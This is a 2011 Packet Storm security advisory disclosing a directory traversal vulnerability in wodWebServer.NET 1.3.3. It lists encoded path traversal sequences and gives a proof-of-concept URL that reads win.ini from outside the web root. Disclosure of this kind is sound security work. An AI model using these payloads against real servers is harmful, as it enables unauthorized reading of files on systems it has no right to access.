Lucene search

K
packetstormAutoSec ToolsPACKETSTORM:99791
HistoryMar 27, 2011 - 12:00 a.m.

wodWebServer.NET 1.3.3 Directory Traversal

2011-03-2700:00:00
AutoSec Tools
packetstormsecurity.com
12
`------------------------------------------------------------------------  
Software................wodWebServer.NET 1.3.3  
Vulnerability...........Directory Traversal  
Threat Level............Serious (3/5)  
Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.asp  
Vendor Contact Date.....3/13/2011  
Disclosure Date.........3/27/2011  
Tested On...............Windows Vista  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <[email protected]>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A directory traversal vulnerability in wodWebServer.NET 1.3.3 can be  
exploited to read files outside of the web root.  
  
  
--Exploit--  
  
..%5C/  
..%2F/  
..%2E/  
..\/  
..//  
.../  
..\  
../  
  
  
--PoC--  
  
http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini  
`